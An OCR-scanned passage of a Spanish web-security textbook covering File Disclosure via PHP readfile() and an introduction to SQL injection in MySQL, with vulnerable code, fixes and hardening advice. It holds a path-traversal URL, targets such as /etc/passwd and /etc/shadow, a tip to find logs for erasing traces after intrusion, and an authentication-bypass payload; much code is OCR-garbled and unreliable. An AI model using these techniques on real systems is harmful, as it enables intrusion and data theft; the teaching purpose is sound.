$archivo = $_GETl'archivo”]; 

echo “<h3>El contenido del archivo es:</h3><br />"; 
$readfile = readfile($archivo); 

2> 


Para empezar, le pasamos a la función readfile() cualquier archivo 
dentro de la ubicación donde estemos para ver qué sucede. 


O temas Peret 


hito //locahat/We...ho'archevos hota pt | 4 

$ 2 lomos pias - ul 
O Disable” di, Cooties” Y CS5 [A Forms” Bl imoger” U informatico” Él Mecellaneour 1 Outine” / Ree K Tools” ME Vio Sowce” 10: Optians” 
El contenido del archivo es: 


HOLA 


Figura 15. Mediante la función readfile() 
podemos leer el contenido de un archivo. 


Como resultado obtuvimos el contenido de un simple documento 
de texto, pero también entendimos que readfile() es similar a include() 


Dd OTRA FUNCIÓN PHP EN FILE DISCLOSURE 


La función PHP file_get_contents() también puede verse implicada en la vulnerabilidad de File Disclosure. 
Realiza una tarea similar a readfile(), con la diferencia de que esta última muestra directamente el conte- 
nido del archivo en pantalla, mientras que con file_get_contents() debe utilizarse print o echo. Se trata de 
otra función que requiere de recaudos especiales. 
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al mostrar el contenido del archivo que le pasemos como parámetro. 
De todos modos, readfile() se vuelve mucho más peligrosa cuando se 
encuentra dentro de un fallo de seguridad. La posibilidad de acceder 

y de leer el código fuente de los documentos PHP del sitio compromete 
aun más al sistema. 


Datos de acceso 


Imaginemos que dentro del sitio web que auditamos encontramos 
un código vulnerable a File Disclosure junto a un archivo llamado 
admin.php, el cual, sospechamos, autoriza el acceso a la administración 
del sitio. Mediante readfile() podremos conocer su contenido. 

Lo primero que debemos hacer será pasarle como parámetro 
a readfile() el archivo admin.php mediante la URL: www. sitio.com/ 
readfile.php?archivo=../admin/admin.php. La página estará vacía, 
pero no así el código fuente. 


hp /Macalnot/0 Parchivn=admin php | + 


€ 2 localhoa 14 


O Disable dl Cookies” Y (55" [Z Forms” LE Images” Ó information" [E Miscellaneous 4 Dutimer $ Resivor A Tools" ME View Source” [. Options" 


El contenido del archivo es: 


e 
a Fuerte de ito /Accalhor/MWenrduinerbles/tá pap?archro- admin php - Merilla Firefox 


<h5>E1 contenido del archivo es:</h3>dr />< php 


af (Jusuario — 'admiz* dé Ípass — “1234 ")( 
echo "'Bieuvenido a la administración 


echo 'Usmarto/contraseña incorrectos 


Figura 16. A diferencia de File Inclusion, cuando se trata de 
File Disclosure podemos ver el código fuente de los archivos PHP. 


Configuraciones y logs 


Continuando la búsqueda de información útil mediante File Disclosure, 
podemos revisar los archivos de configuraciones y logs. La siguiente lista 
contiene algunos archivos de este tipo que podríamos consultar: 
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e access.log: Registro de acceso. 

e error.log: Registro de errores. 

e mysql.log: Registros de la base de datos MySQL. 

e phpinfo: Archivo con una gran cantidad de información acerca 


del estado de PHP y el servidor web. 


php.ini: Archivo de configuración de PHP. 

my.ini: Archivo de configuración de MySQL. 

httpd.conf: Archivo de configuración de Apache. 
re A - 
A A a E 


4 Esmple MISIL config Me don modas yy 6 4 Tis ss la eya eto de mero (TTM - MO) eo MISQL pilas € a portal part ex enteras ey do DEM deso MIS e enel tortas ee de cer 
(encia as a ao carr) 0 + Von ca copo Ml 10 9 o cado at pill os Pr A ro a ret cars ep orcas (a Bs 7 tala De ray es Cr) a am cae cet a pc 
+ 6 ln tus de mm cas e ad long pios de a prog pots * Y mat to ho add opa 1 JO GO. a de proa * bh he * dep” apoon * The fibras our mil de penal to dl MASQL 
[che] eparamcnd — sms paermremd par 508 soci rg recho e Hi Solas mtrs lor amar rc pros € er MIS a 10 
A a a 
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Figura 17. Lectura del archivo de configuración de MySQL 
(my . in) explotando un File Disclosure. 


Tengamos presente el archivo phpinfo, ya que proporciona una 


enorme cantidad de información, muy conveniente para preparar un 
ataque hacia el servidor web. En sí, todos los archivos de configuración 
sirven para descartar o añadir posibles técnicas de ataque a la lista. 
Será útil tener localizados los registros de error y de acceso para, 


d 


espués de acceder al sistema, realizar un borrado de huellas o rastros. 


Archivos del sistema 


Si nos interesa indagar en el servidor web para ver qué encontramos, 


tenemos aún toda la lista de archivos del sistema. Algunos son: 


letc/passwd: Archivo de contraseñas. 
letc/shadow: Archivo de contraseñas cifradas. 
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letc/group: Archivo de usuarios y grupos del sistema. 
/proc/meminfo: Información de la memoria del sistema. 
/proc/mounts: Información de las unidades del sistema. 
Iproc/cpuinfo: Información del CPU. 

/proc/partitions: Información de las particiones del sistema. 
/proc/modules: Lista de todos los módulos cargados en el sistema. 
/proc/devices: Dispositivos configurados para el uso con el kernel. 
Iproc/filesystems: Sistema de archivos soportados por el kernel. 
/proc/drivers: Drivers que están siendo utilizados en el sistema. 
Los archivos del directorio /proc/sys proporcionan información sobre 
el kernel del sistema, mientras que en /proc/net encontraremos datos 
sobre la configuración de red. 


55505 


03 CRUE 
, 


BOBA 51056500560 


14. 


Figura 18. Lectura de un archivo del sistema mediante 
un fallo de seguridad usando readfile(). 


Protección 


Realizaremos la protección contra File Disclosure aplicando filtros 
al igual que hicimos con File Inclusion. Todo se soluciona impidiendo 
que el usuario pueda pasarle a la función utilizada el parámetro que 
quiera. Como programadores de aplicaciones seguras, debemos definir 
de antemano las páginas y documentos que pueden mostrarse a los 
visitantes del sitio web. Veamos un ejemplo de código seguro: 
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<?php 

error_reporting(0); 

if ($_GETT'page]=="“index"“M 
readfile(“index.php”); 

Jelsel 

echo “<h3>Error al leer archivo</h3>”; 
) 
2> 


O uno más complejo, si lo necesitamos: 


<?php 
error_reporting(0); 
$pagina = $ _GETI'page”); 
switch($paginaM 
case “index”: 
readfile(“index.php”); 
break; 
case “contacto”: 
readfile(“contacto.php”); 
break; 
ES) 
) 


> 


En este capítulo descubrimos diferentes modos de obtener información acerca del servidor y la aplica- 


ción web a la cual le estemos realizando una auditoría, aprovechando el descuido de los administradores 
al utilizar las configuraciones por defecto de las aplicaciones, y también la información que se puede en- 
contrar en documentos que no se ocultan lo suficientemente bien. Por otro lado, comprendimos el peligro 
de dejar los errores al descubierto, aprendiendo diferentes maneras de ocultarlos. Por último, conocimos 
la vulnerabilidad File Disclosure, y aprendimos a explotarla y a solucionar el problema que ocasiona. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


¿Qué tipo de información encontraremos revisando el archivo robots.txt? 
¿Cómo obtenemos la estructura completa del sitio web que estamos analizando? 
¿A qué se debe la vulnerabilidad Directory Listing? 

¿Cómo podemos evitar el listado de directorios en nuestro servidor web? 


¿Qué datos útiles podemos obtener analizando los errores? 


GO(<fl60ono0ahquw4m0yNy 


¿De qué se aprovechan los atacantes para obtener información útil casi sin 
esfuerzo? 


a] 


¿Por qué es importante ocultar los errores y cómo podemos hacerlo? 


¿Qué necesitamos para llevar a cabo un ataque tipo Path Transversal? 


EJERCICIOS PRÁCTICOS 


1] Descargue e instale el crawler eNYe-Spider y obtenga la estructura completa 
de un sitio web. 


2 Cree un archivo .htaccess. Experimente habilitando y deshabilitando el listado 
de directorios. 


3  Oculte la notificación de errores desde el archivo de configuración php.ini 
dentro del servidor web. 


4 Programe una aplicación vulnerable a File Disclosure y obtenga información 
de los diversos archivos del sistema nombrados en este capítulo. 


5  Desarrolle una aplicación segura contra File Disclosure. 


hs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Inyección SQL 
a bases de datos 


SSI 


En este capítulo conoceremos los gestores de bases de datos 
más utilizados y aprenderemos a realizarles inyecciones SQL, 

con el fin de entender cómo un atacante puede robar información 
confidencial de una empresa o sitio web. También analizaremos 


diferentes mecanismos de protección contra esta técnica. 


v Introducción a las bases w Protección contra 
ES 244 inyección SQL .....ucocicicconenconons 282 
v Instalación de MySQL ........... 254 y RESUMEN coins 287 
v Inyección SQL en MySQL .....260 rn PRE 288 
w Inyección SQL en Oracle 
Database y PostgreSQL ......... 275 
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Introducción a las 
bases de datos 


Una base de datos es un conjunto estructurado de datos 
interrelacionados y almacenados, sin redundancias innecesarias, y 
aumenta considerablemente el nivel de accesibilidad y disponibilidad 
de la información. Puede ser local, es decir alojada y utilizada en un 
solo equipo, o accedida a través de la red. 

Las bases de datos surgieron gracias a la necesidad de las empresas 
de almacenar grandes cantidades de información y acceder a sus 
datos de una manera fácil y rápida, siempre que fuera necesario. 

Por otro lado, se buscaba reducir notablemente la redundancia en 
la información almacenada, algo inevitable en el antiguo sistema de 
archivos utilizado para guardar los datos de las empresas. 


Arquitectura relacional 


Actualmente, el modelo relacional es el más utilizado para 
implementar bases de datos ya planificadas. Permite establecer 
interconexiones entre los datos a fin de que se pueda relacionar la 
información almacenada evitando las redundancias. 


TABLA 
KAK<«<á;«;—;]áy;á_EEEE 


ID NOMBRE PAISES ID IDCONTINENTE NOMBRE 


1 AMÉRICA 36 1 1 CHILE 
2 EUROPA 45 2 2 ITALIA 
3 ASIA 48 3 1 PERÚ 
4 ÁFRICA 54 4 3 RUSIA 
OS. E: 
COLUMNAS 


Figura 1. El modelo relacional organiza la información 
en tablas que poseen columnas y registros (filas). 


Las bases de datos relacionales organizan la información utilizando 
tablas que poseen columnas. Por ejemplo, una tabla de países podría 
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contener columnas de nombre, tamaño, idioma, 


población, etcétera. Luego, manualmente o EL MODELO 
mediante una aplicación, pueden añadirse RELACIONAL ES 
los registros correspondientes: en este caso, , 

podríamos tener un registro de Argentina con EL MAS UTILIZADO 
los datos que pertenecen a cada columna. PARA IMPLEMENTAR 


Es usual que una tabla precise información 


de otra, por ejemplo, la tabla Países puede BASES DE DATOS 


necesitar información de la tabla Continentes. 

Las bases de datos relacionales permiten que 

ambas tablas compartan la información que necesitan, creando 
una relación sin inconvenientes. 


Gestores de bases de datos 


Los DBMS (DataBase Management System) son complejas 
aplicaciones que brindan una interfaz cómoda y rápida para 
gestionar toda la información de las bases de datos. Mediante 
los DBMS relacionales se facilita el proceso de creación de tablas y 
columnas que requiera la base de datos de la empresa o aplicación 
web. Además, proporcionan herramientas para realizar copias de 
respaldo, controlar los permisos de acceso en usuarios y grupos, 
generar reportes de errores, etcétera. 


A 
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Figura 2. phpMyAdmin es una herramienta escrita 
en PHP que permite la administración del DBMS MySQL. 
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MySQL es un DBMS relacional, de código abierto, muy utilizado en 
la actualidad y que funciona en múltiples plataformas. Puede obtenerse 
bajo licencia GNU GLP, pero las empresas que quieran utilizarlo en 
productos privados deben comprar la licencia. 

Oracle Database es un DBMS desarrollado por Oracle 
Corporation, que ha tenido muchísimo éxito debido a que es muy 
completo y posee instalaciones para Windows, Linux y Solaris, entre 
otros S.O. Cuenta además con varias versiones. Podemos encontrar más 
información en su sitio web oficial: www.oracle.com. 

Microsoft SQL Server, también conocido como MSSQOL, es otro 
DBMS basado en el modelo relacional, soportado por los sistemas 
Windows Server. Facilita la gestión de la base de datos mediante 
un intuitivo entorno gráfico de administración. Podemos descargar 
una evaluación de 180 días desde la página oficial de Microsoft: 
www.microsoft.com. 


PA SCI aiES RESIARIRA" 
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Figura 3. Microsoft SQL Server ofrece un entorno 
gráfico para administrar las bases de datos. 


Si queremos ampliar la información y conocer en detalle todos los tipos de licencias que existen hoy 


en día, estar al tanto de novedades, hacer consultas y descargar el producto, podemos visitar su web 


oficial: www.mysql.com o http: //dev.mysql.com. 
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Existen otros DBMS muy conocidos y utilizados por las empresas y 
aplicaciones web para administrar sus bases de datos, como IBM DB2, 
PostgreSQL, mSQL, Ingres, Informix, entre otros. 


Lenguaje SQL 

SQL (Structured Query Language) es un lenguaje de consulta 
estructurado, utilizado por la mayoría de los DBMS relacionales, 
mediante el cual los gestores de bases de datos 
ejecutan las operaciones necesarias sobre la 


información almacenada y su estructura. SQL ES EL LENGUAJE 
El lenguaje SOL está compuesto por MÁS UTILIZADO 
comandos, cláusulas, operadores y funciones, 
que analizaremos a continuación. Saber POR LAS BASES 
armar correctamente las consultas SOL es DE DATOS 
indispensable para comprender y realizar 
ataques contra las bases de datos, tal como RELACIONALES 
veremos en este capítulo. 
Cuanto más conocimiento tengamos sobre el 4 D 
lenguaje SOL y la forma en que lo implementan los diferentes 


DBMS, más habilidad tendremos a la hora de atacar o defender 
nuestras bases de datos. 
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Figura 4. La herramienta phpMyAdmin 
para MySQL dispone de una consola para ejecutar 
consultas SQL escritas manualmente. 
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DDL y DML 


Dentro de SQL tenemos dos lenguajes: 

e DDL (Data Definition Language), utilizado para definir la estructura 
de la base de datos. 

e DML (Data Manipulation Language), cuyo fin es manipular la 
información almacenada en la base de datos. 

En cuanto a las operaciones básicas para definir los datos (DDL), 
contamos con los comandos CREATE TABLE, ALTER TABLE y DROP 
TABLE, para crear, modificar y eliminar tablas completas. 

En el caso de que quisiéramos crear una tabla de países, la sintaxis 
DDL sería similar a la siguiente: 


CREATE TABLE paí sesí 
ID int(9) unsigned auto_increment not null, 
Nombre varchar(255) not null, 
Idioma varchar(255) not null, 
Tamaño varchar(255) not null, 
Población varchar(255) not null, 
KEY (1D) 


Luego de ejecutarse el comando se creará la tabla países con 
las columnas ID, Nombre, Idioma, Tamaño y Población, con sus 
respectivas características. La columna ID es la clave primaria, 
que identifica de manera única los registros de una tabla. 

Es importante que su valor se autoincremente cada vez 
que se añade un nuevo registro, para evitar así que existan dos 
identificadores iguales dentro de una misma tabla y para que los 
datos se puedan acceder de manera precisa. 


uv vw 


D MODELOS DE BASES DE DATOS 


Aunque actualmente el modelo relacional es el más utilizado, no es el único que existe. El modelo jerár- 
quico, uno de los más antiguos, es utilizado por LDAP (Lightweight Directory Access Protocol). También 
existe el modelo de red (similar al jerárquico), el de datos distribuidos y el orientado a objetos. 
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Figura 5. Creamos una tabla mediante un comando 
DDL en la base de datos test de MySQL. 


Comandos DML 


En esta sección profundizaremos en los comandos para la 
manipulación de datos (DML), ya que son utilizados en los ataques 
de inyección SQL, debido a que permiten extraer de una base de datos 
toda la información que se quiera, así como también insertar nueva, 
modificar la existente e incluso borrarla. 

Para realizar una determinada búsqueda dentro de una base 
de datos y obtener el resultado esperado, creamos una consulta 
utilizando el comando SELECT. Por ejemplo, si quisiéramos traer 
absolutamente todos los registros que almacena una tabla, la 
consulta sería la siguiente: 


SELECT * FROM nombre_tabla 


Con el asterisco (*) indicamos que queremos visualizar todos 
los registros de la tabla nombre_tabla, que lógicamente debe ser 
reemplazada por la que corresponda en cada caso. Como podemos 
observar, la sintaxis SOL de comandos DML es bastante deducible, 
por lo que resulta simple y fácil de entender. 
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Si queremos agregar un nuevo registro usamos el comando INSERT 
INTO. Su sintaxis puede parecer más compleja, pero al acostumbrarnos 
a utilizar el lenguaje SOL nos daremos cuenta de que sigue 
manteniendo el mismo nivel de simplicidad. 


INSERT INTO "países ( 

"ID", Nombre”, "Idioma', "Tamaño, "Población 
) VALUES( 

“Argentina” “Castellano” /*”/"42,192.494" 


) 


QUID recae! te poes lo | 
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Figura 6. Un nuevo registro insertado en la tabla 
de países dentro de la base de datos test de MySQL. 


Como observamos, la sintaxis de INSERT INTO requiere que 
especifiquemos previamente la tabla que almacenará el nuevo registro, 


uu vY 


HO COMUNICACIÓN CON LAS BASES DE DATOS 


La mayoría de los lenguajes de programación utilizados en la actualidad poseen librerías y funciones para 


el desarrollo de aplicaciones que necesiten almacenar información en una base de datos. Por ejemplo, 
PHP tiene una gran lista de funciones para conectarse e interactuar con MySQL y otros DBMS. 
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luego los nombres de las columnas existentes, y 
finalmente los valores que corresponden. En este 
caso tenemos cinco columnas, por lo cual hay que 
añadir cinco valores. 

UPDATE es el comando DML para modificar 
los registros ya existentes en una tabla. Para 
comprender su funcionamiento, modificaremos 
el registro de Argentina que hemos agregado 
con INSERT INTO, cambiando el nombre del país. 
Ejecutamos la siguiente consulta: 


UPDATE "países SET "Nombre =”Uruguay” 


251 


UN COMANDO DML 
PUEDE AÑADIR, 
CAMBIAR O ELIMINAR 
INFORMACIÓN DE UNA 
BASE DE DATOS 


El comando es breve, pero debemos tener en cuenta que cambiará 
el nombre del país a “Uruguay” en absolutamente todos los registros. 
Si este no fuera el resultado esperado, para cambiar el nombre a un 
solo registro deberemos utilizar la cláusula WHERE, que conoceremos 


en la siguiente sección. 
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Figura 7. El comando DML UPDATE modifica los registros de una tabla. 


Cláusulas y funciones 


El lenguaje SOL también está compuesto por cláusulas, que ayudan 
en gran medida a armar consultas mucho más específicas. Una de ellas 
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es FROM (utilizada anteriormente junto al comando SELECT), e indica la 
tabla que se va a consultar. Por ejemplo, si realizamos una búsqueda de 
información con el comando SELECT, tendremos que especificar dentro 
de qué tabla se encuentran los datos. 


SELECT Nombre, Idioma FROM países 


Otra cláusula, tan importante como útil, es WHERE, que sirve 
para especificar condiciones dentro de una consulta. Por ejemplo, el 
comando DML DELETE, utilizado para borrar datos, requiere que se le 
indique el registro que debe eliminar: 


DELETE FROM países WHERE ID=1 


Ejecutando esa consulta eliminaremos, de la tabla países, el registro 
con el identificador número uno. Si necesitamos cambiar el nombre del 
idioma a varios países, en lugar de hacerlo uno por uno y mientras la 
columna tenga el mismo valor para todos, podemos hacerlo mediante 
una simple consulta, utilizando la cláusula WHERE. 


UPDATE países SET Idioma=”Español Latino” WHERE Idioma=”Castellano” 


En todos los registros de la tabla países donde el idioma sea igual 
a “Castellano” se reemplazará por “Español Latino”. 

Al avanzar en técnicas de inyección SQL pueden ser de utilidad 
otras cláusulas que, si bien no utilizaremos en este capítulo, vamos 
a mencionar: ORDER BY, utilizada para mostrar el resultado de una 


"AS 


DN DOCUMENTACIÓN SOBRE INYECCIÓN SQL 


El sitio web de OWASP ofrece bastante documentación sobre la técnica de inyección SQL. Podemos consultar 


en español el siguiente enlace: www.owasp.org/index.php/Inyección_SQL. También disponemos de un 
poco más de información en inglés: www.owasp.org/index.php/Reviewing Code for_SQL Injection. 
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consulta en un orden específico -que pudiera ser ASC (ascendente) 
o DESC (descendente)- y GROUP BY, que sirve para mostrar los 
resultados en grupos específicos. 
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Figura 8. Mediante el uso de la cláusula WHERE 
se pueden añadir condiciones a la consulta SQL. 


En cuanto a las funciones, solo mencionaremos la función COUNT(), 
que puede ser utilizada para obtener el número de registros que posee 
una tabla. Por ejemplo: 


SELECT COUNT(*) FROM países 


Esta breve consulta devuelve como resultado la cantidad total 
de registros que contiene la tabla países. 

Además de comandos, cláusulas y funciones, también hay 
operadores lógicos y de comparación, como en la mayoría 


Dd FUNCIONES HASH 


La función hash es un algoritmo capaz de generar una combinación de números y letras que representa 
de manera casi única un archivo o dato. A partir de un hash no se puede obtener el dato original que lo ge- 
neró, por lo que son ampliamente utilizadas para evitar el almacenamiento de contraseñas en texto plano. 
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de los lenguajes de programación. La mejor manera de aprender 
SQL es realizar consultas con todo tipo de comandos dentro de la 
consola del DBMS. 


Instalación de MySQL 


Al hablar de los gestores de base de datos nombramos a MySQL 
como un DBMS relacional, de código abierto y muy utilizado. 
Aprovecharemos su simplicidad para instalarlo en nuestro servidor 
y realizar todas las prácticas del capítulo. 


Descarga de paquetes 


En el Capítulo 1, cuando instalamos Ubuntu Server, tuvimos la 
posibilidad de añadir el paquete LAMP, que viene con Apache, MySQL 
y PHP. Si no lo hicimos, deberemos instalarlo manualmente. Para 
hacerlo, ingresamos al archivo de MySQL en http://downloads.mysq]l. 
com/archives.php) y elegimos MySQL Database Server. 
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Figura 9. En el archivo de MySQL están disponibles 
las descargas necesarias, por versión y plataforma. 


El archivo que descarguemos va a depender del sistema operativo 
que tengamos instalado en nuestro servidor web. Si estamos utilizando 
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Microsoft Windows podemos elegir la opción para dicho sistema 

y descargar el instalador de MySQL. Existen también versiones para 
Mac OS X, Sun Solaris y FreeBSD, así como paquetes RPM para las 
distribuciones GNU/LINUX. Por último, MySQL permite descargar el 
código fuente para poder compilarlo. 


Instalación de componentes 


Una vez obtenidos los archivos correspondientes a la plataforma de 
nuestro servidor web, procedemos a instalar el gestor MySQL. En el 
caso de Windows utilizaremos el instalador y seguiremos sus pasos, 
como con cualquier otra aplicación. 


BY MySQL Server 56 Serp sa z 
Custom Setup 
Select he wey yos want fcetures to be installed. 


Click the icors in the tree below tc hange the may features wil be installed. 
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Develooment Components 
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> | Server data files your hard dre. It has 2 0f 2 
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subfeatures require 38M on your 
hard drive. 
Localion: Ci Program Files MySQUMySQL Server 5.51 Bromse. .. 
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Figura 10. En esta figura vemos el instalador 
del DBMS MySQL para Microsoft Windows. 


Si estamos utilizando una distribución Linux con soporte para 
paquetes RPM la instalación también será sencilla. En primer lugar, 


HO DOCUMENTACIÓN SOBRE MYSQL 


255 


El gestor de bases de datos MySQL tiene un sitio web oficial muy completo, con documentación de todo 


tipo para satisfacer las necesidades de usuarios y desarrolladores. La información está disponible en 


varios idiomas y podemos acceder a las guías desde http://dev.mysql.com. 


www.detodoprogramacion.com www.redusers.com 


< 


256 (MES 9. INYECCIÓN SQL A BASES DE DATOS 


instalamos el intérprete del lenguaje Perl para evitar errores 
de dependencias en MySQL. Luego, ejecutamos la siguiente 
secuencia de comandos: 


rpm -ivh MySQL-shared-(version).rpm 
rpm -ivh MySQL-server-(versión).rpm 


rpm -ivh MySQL -client-(versión).rpm 


Por último, si queremos hacer la compilación directamente desde el 
código fuente, tendremos que consultar la documentación de la página 
oficial de MySQL. Los pasos varían un poco según la versión, por lo cual 
debemos consultar la guía correspondiente a la versión descargada. 
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Figura 11. En la página oficial de MySQL hay disponible 
una guía paso a paso para instalar el DBMS desde el código fuente. 


information_schema y mysql 


El gestor MySQL instala por defecto al menos dos bases de datos, 
debido a que el DBMS necesita un lugar donde almacenar todos los 
datos relacionados con la estructura de la información y los usuarios 
que pueden acceder, entre otros ítems. 


»  Www.redusers.com www.detodoprogramacion.com 


WEB HACKING USERS 


information_schema es la base de datos instalada por defecto, que 
almacena información acerca de todas las otras bases que mantiene 
el servidor MySQL (por ejemplo, los nombres de las tablas, el tipo 
de dato de las columnas, los permisos de acceso, etcétera). 

Las tablas de information_schema a menudo consultadas en los 
ataques de inyección SOL en MySQL son: 


e Schemata: contiene información sobre las bases de datos alojadas 
en el servidor. 

e Tables: proporciona información acerca de las tablas de todas 
las bases de datos. 

e Columns: almacena información sobre las columnas de cada una 
de las tablas. 
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Figura 12. Listado de tablas de la base 
de datos information_schema. 


La otra base de datos instalada por defecto es mysql, que almacena 
información sobre el gestor en sí. Una de las tablas que contiene 
guarda los datos de acceso de los usuarios del DBMS. 


Cuestiones de seguridad 


Al instalar un servidor de bases de datos MySQL debemos tener en 
cuenta algunos aspectos de seguridad sumamente importantes. En esta 
sección del capítulo aprenderemos a implementar seguridad sobre la 
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base de datos respecto a usuarios, permisos, conexiones, puertos y 
servicios de MySQL. Estas medidas de protección pueden aplicarse de 
manera similar en otros DBMS. 


Asignar contraseñas 

Al instalarse, MySQL crea una cuenta llamada root, con permisos 
de administración sobre todas las bases de datos. Esta cuenta no viene 
configurada con contraseña, por lo cual cualquier persona podría 
ingresar al DBMS como usuario root y obtener los permisos más elevados 
sin inconvenientes. Nuestro primer paso de seguridad al instalar MySQL, 
entonces, debe ser asignar una contraseña segura al usuario root. 

Dentro de MySQL también existen las cuentas anónimo, que tampoco 
tienen contraseña. Si bien estos usuarios no cuentan con privilegios 
de administración, se recomienda asignarles una clave segura o 
directamente eliminarlos. En caso de crear más cuentas, no olvidemos 
asignarles sus respectivas claves. Si observamos la tabla user de la 
base de datos mysql, notaremos que las contraseñas de los usuarios no 
aparecen en texto plano. Esto sucede porque el DBMS utiliza la función 
PASSWORD() para generar un hash de las claves asignadas a cada 
cuenta. Hasta la versión 4.1 de MySQL el algoritmo utilizado generaba 
un hash de 16 bytes; actualmente, es de 41 bytes, lo cual dificulta un 
poco más a un atacante la obtención de la contraseña original. 
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Figura 13. Contraseña segura asignada al usuario root 
mediante la función PASSWORDO) de MySQL. 
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Control de privilegios 


Como segundo paso de seguridad, debemos DEBEMOS ASIGNAR 
administrar correctamente los privilegios UNA CONTRASEÑA 
de todos los usuarios creados en MySQL. 

Utilizaremos una cuenta con los permisos SEGURA AL USUARIO 
mínimos para que realice las consultas que ROOT CUANDO 
envían los usuarios de la aplicación, a fin de 

limitar el uso de la cuenta root únicamente a INSTALAMOS MYSQL 
tareas administrativas. 

Es importante que el usuario root sea el E y 
único que pueda consultar la información de la tabla user, ya que 


contiene las contraseñas asignadas a todas las cuentas. Si bien las 
claves están en formato hash, la información no debe ser expuesta 
innecesariamente. 


Cifrar conexiones 

Siempre que transmitamos datos sensibles a través de internet, 
como claves privadas e información confidencial, debemos utilizar 
una conexión cifrada mediante SSL (Secure Sockets Layer). Así, 
evitaremos enviar nuestros datos en texto plano, dificultando la tarea 
del atacante. El gestor de bases de datos MySQL soporta conexiones 
SSL internas desde la versión 4.0.0. 


Puertos y servicios 

MySQL utiliza el puerto 3306 por defecto y debemos asegurarnos de 
que no sea accesible desde equipos ajenos, es decir, que esté cerrado. 
Para averiguar su estado podemos utilizar un escáner de puertos como 
NMAP o realizar una conexión mediante NetCat a nuestro servidor 


Ny ACCIONES PROHIBIDAS 


No debemos permitir que el DBMS tenga permisos para crear nuevos archivos ni acceder a directorios 
con información sensible sobre el servidor web (por ejemplo, /etc/passwd en Linux). Si esto ocurre, le 
facilitaremos la tarea al atacante y éste podría llegar a comprometer el sistema completo. 
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web, a través del puerto 3306, y analizar su respuesta. Si no logramos 
conectarnos, está cerrado; de lo contrario, tendremos que bloquearlo 
en nuestro firewall. 


> Zenmap [s[a| 3] 
Scan Tools Profile Help 


Targer  200.1649.50 (u] Protile (») [Scan] [canc 
Command:  nmap -35 -34 200.16.99 50 


¡A Services Mmap Output: Ports / Hosts 


Topolegy | Host Details | Scans 


OS 4 Host 4 Por 4 Protocol 4 State € Service 4 Version y 
MY pertoraner 14.208, | O 0 tp a 
WM 18657-22I53spee | Y 24 open Mp ProFTPD 
1921680100 0.0.m< open http 
MI rei93138-77:157 | € tp open https 
MY 200:16.29.50 0 su top open Osiris ostra host 105 agent 
O 55 rep open  rtsp-prow Blue Coat rsp proxy (Uni ensed) 
O 155 «p open wms 
0 22 ep closed ccproxy-ttp 


Figura 14. NMAP es un excelente escáner 
de puertos disponible en www.nmap.org. 


Dentro del servidor web debemos crear un usuario con los 
mínimos permisos para ejecutar el servicio de MySQL. Si así lo hacemos 
evitaremos otros riesgos de seguridad en nuestro sistema en caso de 
que el gestor sea comprometido en un ataque. 


Inyección SOL en MySQL 


Llegó el momento de ponernos nuevamente en la piel del atacante 
y comprender una vulnerabilidad que afecta a un alto porcentaje de 
aplicaciones que manejan bases de datos. Se basa en el incorrecto 
filtrado de parámetros provenientes del usuario al armar una consulta 
que será enviada a la base de datos. La falla es explotada mediante la 
conocida técnica de inyección SQL. 

Según el escenario al que nos enfrentemos, mediante una inyección 
SQL podemos alcanzar diferentes objetivos, desde saltar un sistema de 
autenticación y robar una base de datos completa, hasta apoderarnos 
del servidor creando archivos nuevos en él. 
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Figura 15. Un atacante intentará inyectar código SQL 
a la base de datos para manipular su comportamiento. 


Como atacantes, nuestro objetivo es inyectar código SQL dentro 

de la consulta original para alterar el funcionamiento normal de la 

aplicación y conseguir la información que nos interesa. Podemos 

dividir este ataque en tres clases diferentes: 

e InBand: es el más frecuente; ocurre cuando inyectamos código SOL 
y recibimos la respuesta dentro de la misma aplicación vulnerable. 
Es la manera más simple de atacar, ya que podemos ver fácilmente 
la información que nos interesa extraer de la base de datos. 

e Out-Of-Band: es menos frecuente y sucede cuando la aplicación es 
vulnerable pero, al realizar la inyección, se recibe la respuesta por 
otro lado. Si la falla se encontrara en un formulario, al inyectar se 
generaría la consulta y la respuesta sería enviada, por ejemplo, en 
un correo electrónico. 

e Inferential: en esta ocasión no hay transferencia de datos, es decir, 
no se recibe respuesta a la consulta por ningún medio. Sin embargo, 
es posible obtener la información que nos interesa analizando el 
comportamiento del servidor ante diferentes inyecciones SQL. 


INYECCIÓN A CIEGAS 


Los ataques de inyección SQL de tipo inferencial pueden suceder si la aplicación muestra una página de 
error personalizada que no revela ningún tipo de información sobre la consulta original. Sin embargo, la apli- 
cación no deja de ser vulnerable y la falla puede explotarse mediante la técnica de Blind SQL injection (In- 
yección SQL a ciegas). Podemos leer al respecto en www.owasp.org/index.php/Blind_SQL Injection. 
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Saltear el sistema de autenticación 


Un típico sistema de autenticación que solicite usuario y contraseña 
podría evadirse inyectando código SQL en el formulario de acceso. Para 
entenderlo, analicemos el comportamiento de un código vulnerable: 


<?php 
error_reporting(0); 
include (conexion_a_db.php”); 


$user = $ POSTT'usuario”); 
$pass = $_POSTI password"); 


$query = “SELECT * FROM "usuarios WHERE User='$user' AND Pass='$pass';”; 
$res = mysql_query($query); 


ifmysql_num_rows($res) != 0 
echo “Accedió correctamente”; 
Jelsetí 
echo “Acceso denegado”; 
) 
2> 


Las primeras dos líneas del código indican, respectivamente, que 
no deben mostrarse mensajes de error y que se incluye el archivo que 
conecta a la base de datos. Luego se declaran dos variables (user y pass), 
que reciben su valor por parte del usuario a través del método POST (los 
datos se ingresarán mediante campos de texto). Dentro de otra variable, 
llamada query, es definida la consulta que se enviará a la base de datos: 
buscar dentro de la tabla usuarios el registro donde el nombre de usuario 
y la contraseña coincidan con los ingresados en el formulario. Finalmente, 
se ejecuta la consulta SOL y se llega a una sentencia de condición que 
analizará la respuesta de la base: si el resultado no es igual a cero, existe 
un usuario con esas credenciales dentro de la base de datos, por lo tanto 
la aplicación permitirá el acceso; de lo contrario, no lo hará. 

Analicemos ahora el código desde el punto de vista de la seguridad. 
En primer lugar, la consulta se termina de armar utilizando dos 
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variables cuyo valor es asignado por el usuario de la aplicación, sin 
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incluso, el caso de que el primer registro de la tabla corresponda 
al administrador y la aplicación nos autentique como tal. 


[Él Miscellaneous” 4 Outline” $ Resizer £ Tocio ME View Source” 1 Optione” 


Formulario de acceso 


Ingrese su usuario y contraseña 


nolose' OR *1'="1 
See rr... . .m......... 


Acceder | 


Accedió correctamente 


Figura 16. Saltamos el sistema de autenticación 
inyectando un código SQL que modificará la consulta original, 
